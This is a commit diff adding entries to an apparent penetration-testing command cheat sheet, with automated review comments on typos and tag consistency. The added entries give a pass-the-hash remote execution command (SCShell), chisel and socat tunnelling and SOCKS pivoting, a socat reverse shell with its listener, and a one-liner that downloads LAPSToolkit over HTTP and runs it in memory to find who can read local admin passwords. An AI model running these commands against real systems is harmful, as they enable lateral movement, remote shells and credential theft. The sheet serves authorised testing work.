Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing 18 changed files with 373 additions and 12 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
# SCShell | ||
|
||
% SCShell, psexec, sealthy, DCERPC | ||
|
||
## stealty psexec | ||
#plateform/linux #target/remote #cat/ATTACK/CONNECT | ||
|
||
no service created, no smb used, no file droped | ||
https://github.com/Mr-Un1k0d3r/SCShell | ||
|
||
``` | ||
python3 scshell.py -service-name <service-name|defragsvc> -hashes :<ntlm-hash> <domain>/<user>@<ip> | ||
``` |
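Review bot: The keyword line `% SCShell, psexec, sealthy, DCERPC` and the heading `## stealty psexec` both misspell "stealthy", so a keyword search with the correct spelling will not find this entry; "droped" in the description should be "dropped". The description says "no service created" while the command requires `-service-name <service-name|defragsvc>`, so add one line saying what the named service is used for, otherwise the two statements read as contradictory.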
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,49 @@ | ||
# chisel | ||
|
||
% chisel | ||
|
||
## chisel server (server on local machine) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
All commands on arsenal are done with server on kali machine and client on the target. | ||
Client or Server can also be launch on windows with chisel.exe | ||
``` | ||
./chisel server -v -p <server_port|8000> --reverse | ||
``` | ||
|
||
## chisel reverse port forwarding (client on remote machine) - forward client port on server | ||
#plateform/linux #target/remote #cat/PIVOT | ||
|
||
This forward {clientside-host}:{clientside-port} to server {local-port} | ||
To get the port of the client machine locally on serverside. | ||
ex: R:2222:localhost:22 to get the client 22 (ssh) on the port 2222 of the server | ||
| server | - 2222 <----- |client|-127.0.0.1:22 | ||
on server : ssh -p 2222 127.0.0.1 | ||
|
||
``` | ||
./chisel client -v <server_ip>:<server_port|8000> R:<serverside-port>:<clientside-host|localhost>:<clientside-port> | ||
``` | ||
|
||
## chisel remote port forwarding (client on remote machine) - forward server port on client | ||
#plateform/linux #target/remote #cat/PIVOT | ||
|
||
To expose server port remotely (usefull to expose your listener) | ||
This forward {serverside-host}:{serverside-port} from the server to {clientside-host}:{clientside-port} | ||
ex : 0.0.0.0:4445:127.0.0.1:4444 expose the server 4444 listener to client 4445 | ||
| server | - 4444 -------> |client|-4445 : * <- | ||
|
||
``` | ||
./chisel client -v <server_ip>:<server_port|8000> <clientside-host|0.0.0.0>:<clientside-port>:<serverside-host|127.0.0.1>:<serverside-port> | ||
``` | ||
|
||
## chisel socks proxy (client on remote machine) | ||
#plateform/windows #target/remote #cat/PIVOT | ||
|
||
If the server is launch with --reverse you can specify R: socks to get a proxy socks on server machine (port 1080) | ||
On server with proxychains set on port 1080 you can proxy socks request on the client. | ||
|
||
``` | ||
./chisel client <server_ip>:<server_port> R:socks | ||
``` | ||
|
||
|
||
|
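Review bot: The socks proxy entry at the end of the hunk is tagged `#plateform/windows`, but its command is `./chisel client ...` like the three entries tagged `#plateform/linux`, and the intro says the Windows binary is `chisel.exe`; make the tag match the command. The same command uses `<server_port>` without the `|8000` default that every other entry carries. Spelling: "can also be launch" and "is launch with --reverse" should read "launched", and "usefull" should be "useful". The empty lines at the end of the file can be dropped.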
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
# socat | ||
|
||
% socat | ||
|
||
## socat port forwarding listener (on local machine) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
``` | ||
./socat TCP-LISTEN:<port_listener|4444>,fork,reuseaddr TCP-LISTEN:<port_to_forward> | ||
``` | ||
|
||
## socat port forwarding connect (on remote machine) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
``` | ||
./socat TCP:<connect_ip>:<connect_port|4444> TCP:127.0.0.1:<port_to_forward> | ||
``` | ||
|
||
## socat reverse shell (remote victime) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
``` | ||
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listner_ip>:<listner_port|4444> | ||
``` | ||
|
||
## socat reverse shell listener (local) | ||
#plateform/linux #target/remote #cat/PIVOT | ||
``` | ||
socat file:`tty`,raw,echo=0 tcp-listen:<listner_port|4444> | ||
``` | ||
|
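Review bot: The two reverse shell entries spell their placeholders `<listner_ip>` and `<listner_port|4444>`, while the first entry names the same port `<port_listener|4444>`; use one correctly spelled placeholder name throughout the file. The last entry calls `socat` while the other three call `./socat`, and it is tagged `#target/remote` although its heading says "(local)". "victime" in the third heading should be "victim". Unlike the chisel entries in this commit, none of the four entries has a description line saying which side each port lives on; one sentence per entry would help, in particular for the listener entry with two `TCP-LISTEN` addresses.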
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
# LAPS | ||
|
||
% LAPS, passwords | ||
|
||
## laps toolkit | ||
#plateform/windows #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER | ||
|
||
https://github.com/leoloobeek/LAPSToolkit | ||
|
||
```powershell | ||
(new-object system.net.webclient).downloadstring('http://<lhost>/LAPSToolkit.ps1') | IEX; Import-Module .\LAPSToolkit.ps1 | ||
``` | ||
|
||
## laps toolkit - Get laps computer | ||
#plateform/windows #target/remote #cat/RECON | ||
```powershell | ||
Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers | ||
``` | ||
|
||
## laps toolkit - find LAPS Delegated Groups | ||
#plateform/windows #target/remote #cat/RECON | ||
```powershell | ||
Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups | ||
``` | ||
|
||
## laps toolkit - Find users with Extented rights | ||
#plateform/windows #target/remote #cat/RECON | ||
```powershell | ||
Import-Module .\LAPSToolkit.ps1; Find-AdmPwdExtendedRights | ||
``` |
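Review bot: In the first entry, `downloadstring(...) | IEX` loads the script into the session without writing it to disk, so the `Import-Module .\LAPSToolkit.ps1` that follows on the same line only works if the file is already in the current directory; keep one loading method per entry. The three later entries all start with `Import-Module .\LAPSToolkit.ps1`, so they depend on that local file as well, which the first entry should state. The download uses plain `http://` and the script is executed with no integrity check. "Extented" in the last heading should be "Extended", and heading capitalisation is inconsistent ("Get laps computer", "find LAPS Delegated Groups").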